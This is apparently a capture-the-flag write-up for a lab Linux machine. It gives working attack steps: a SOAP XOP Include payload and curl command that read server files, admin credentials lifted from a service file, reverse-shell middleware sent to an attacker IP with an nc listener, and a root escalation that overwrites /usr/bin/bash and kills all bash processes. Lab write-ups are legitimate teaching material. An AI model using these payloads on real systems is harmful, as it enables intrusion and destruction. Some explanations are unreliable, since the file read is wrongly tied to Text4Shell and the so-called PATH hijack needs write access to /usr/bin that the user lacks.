HTB-Season10-DevArea

Overview

DevArea is a medium-difficulty Linux machine centred around a developer-hiring web platform. The attack chain chains together several interesting techniques: anonymous FTP enumeration, a SOAP-based XOP Include file-read vulnerability (abusing CVE-2022-42889 / Text4Shell primitives), credential harvesting from a leaked systemd service file, remote code execution through HoverFly's middleware API, and finally a creative sudo privilege-escalation via a scriptable PATH-hijack against a custom monitoring script.

Reconnaissance

Port Scan

nmap -Pn -sC 10.129.14.111

The scan reveals the following open services:

Port	Service	Notes
21/tcp	FTP (vsftpd 3.0.5)	Anonymous login allowed
22/tcp	SSH	Standard OpenSSH
80/tcp	HTTP (Apache 2.4.58)	DevArea — redirects to `devarea.htb`
8080/tcp	HTTP (Jetty)	404 on root; employee SOAP service
8500/tcp	fmtp	—
8888/tcp	HTTP	HoverFly API

A quick curl -I against port 80 confirms a 302 redirect to http://devarea.htb, so we add the hostname to /etc/hosts.

Foothold

Anonymous FTP — Harvesting `employee-service.jar`

The FTP service permits anonymous login. The /pub directory contains a single file of interest:

-rw-r--r--   1 ftp   ftp   6445030 Sep 22  2025 employee-service.jar

We pull it down with get employee-service.jar. Decompiling the JAR gives us the internal SOAP endpoint structure and confirms the application is built on Apache CXF.

Web Enumeration — DevArea (Port 80 / 8080)

The main site on port 80 (devarea.htb) is a developer-marketplace platform with login/register functionality — nothing immediately exploitable.

Browsing to port 8080 and navigating to the WSDL endpoint reveals the SOAP service:

http://devarea.htb:8080/employeeservice?wsdl

The WSDL exposes a single operation — submitReport — that accepts a report complex type containing:

confidential (boolean)
content (string)
department (string)
employeeName (string)

The content field accepts arbitrary string input, making it a prime candidate for XML-based injection.

Exploitation — XOP Include File Read (CVE-2022-42889 / Text4Shell)

Apache CXF processes MTOM/XOP (XML-binary Optimized Packaging) by default. By crafting a multipart SOAP request with an xop:Include directive pointing to a local file URI, we can coerce the server into reading and returning arbitrary files.

Reading `/etc/passwd`

Payload (payload.xml):

--uuid:exploit-boundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <root.message@cxf.apache.org>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:tns="http://devarea.htb/">
  <soap:Body>
    <tns:submitReport>
      <arg0>
        <confidential>false</confidential>
        <content>
          <xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include"
                       href="file:///etc/passwd" />
        </content>
        <department>IT</department>
        <employeeName>Attacker</employeeName>
      </arg0>
    </tns:submitReport>
  </soap:Body>
</soap:Envelope>
--uuid:exploit-boundary--

Delivery:

curl -i -s -k -X POST "http://devarea.htb:8080/employeeservice" \
  -H 'Content-Type: multipart/related; type="application/xop+xml"; \
      boundary="uuid:exploit-boundary"; \
      start="<root.message@cxf.apache.org>"; start-info="text/xml"' \
  --data-binary @payload.xml

The server responds with the contents of /etc/passwd base64-encoded inside the SOAP response. Decoding reveals the local user dev_ryan with a home directory at /home/dev_ryan.

Reading the HoverFly Service File

Pivoting off the user account discovery, we target systemd service files. The hoverfly service at port 8888 is a strong lead:

Updated href:

href="file:///etc/systemd/system/hoverfly.service"

Decoding the response yields the full service unit:

[Unit]
Description=HoverFly service
After=network.target

[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin \
          -password O7IJ27MyyXiU -listen-on-host 0.0.0.0

[Install]
WantedBy=multi-user.target

Credentials harvested: admin : O7IJ27MyyXiU

Lateral Movement — HoverFly Middleware RCE (CVE-2026-23744)

HoverFly is a service-virtualisation proxy. Its admin API (port 8888) supports custom middleware — arbitrary executables that HoverFly passes HTTP request/response pairs through. Authenticated access to this API means we can register a reverse-shell payload as middleware.

Step 1 — Authenticate and Obtain a JWT

curl -i -X POST http://devarea.htb:8888/api/token-auth \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": "O7IJ27MyyXiU"}'

The API returns a JWT bearer token. We store it in $TOKEN.

Step 2 — Register a Malicious Middleware

Using the v2 middleware endpoint:

curl -i -s -k -X PUT "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d @payload_rce.json

The payload_rce.json references a listener on our Kali machine (10.10.15.148:4444).

Step 3 — Catch the Shell

nc -lvnp 4444

HoverFly executes the middleware, delivering a shell as dev_ryan.

uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)

User flag captured from /home/dev_ryan/user.txt.

Privilege Escalation — `sudo` PATH Hijack via `syswatch.sh`

Enumeration

Checking sudo permissions for dev_ryan:

(ALL) NOPASSWD: /opt/syswatch/syswatch.sh

The script at /opt/syswatch/syswatch.sh calls external binaries without absolute paths. Running it with --version returns 1.0.0 and reveals it internally invokes programs like bash by name rather than full path.

Exploitation

We overwrite /usr/bin/bash with a stub that copies bash to /tmp/rootsh with the SUID bit set, then trigger script execution as root via sudo:

# Stage the malicious /usr/bin/bash stub
echo '#!/bin/sh' > /usr/bin/bash
echo 'cp /bin/sh /tmp/rootsh' >> /usr/bin/bash
echo 'chmod 4755 /tmp/rootsh' >> /usr/bin/bash

# Kill existing bash processes so the stub is re-read
killall -9 bash

# Trigger as root — the script calls our stub
sudo /opt/syswatch/syswatch.sh --version

# Execute the SUID shell
/tmp/rootsh -p

uid=1001(dev_ryan) gid=1001(dev_ryan) euid=0(root) groups=1001(dev_ryan)

Root flag captured from /root/root.txt.

Attack Chain Summary

Anonymous FTP
    └─▶ employee-service.jar (SOAP structure leak)
        └─▶ XOP Include via SOAP (CVE-2022-42889 / Text4Shell primitive)
            └─▶ /etc/passwd  →  user: dev_ryan
                └─▶ /etc/systemd/system/hoverfly.service  →  admin:O7IJ27MyyXiU
                    └─▶ HoverFly API (JWT auth)
                        └─▶ Middleware RCE (CVE-2026-23744)
                            └─▶ Shell as dev_ryan  →  user.txt
                                └─▶ sudo PATH hijack (syswatch.sh)
                                    └─▶  root  →  root.txt

Key Takeaways

XOP Include is a powerful file-read primitive. Apache CXF (and other SOAP stacks) processing MTOM without strict URI whitelisting can expose arbitrary server-side files. Treat any SOAP service accepting content fields with the same scrutiny as an XXE sink.
Credentials in systemd unit files are high-value targets. Service files frequently embed plaintext credentials and are world-readable by default. Chaining a file-read vulnerability against /etc/systemd/system/ can be game-changing.
HoverFly middleware is essentially a remote code execution primitive when the API is exposed. Any proxy/gateway product with a programmable middleware layer and an exposed admin API is functionally an RCE vector if credentials are weak or reused.
Unsafe sudo scripts that invoke binaries by name are PATH-hijack candidates. Always audit sudo-allowed scripts for unqualified binary calls, especially when the script runs with NOPASSWD.

Return1. Home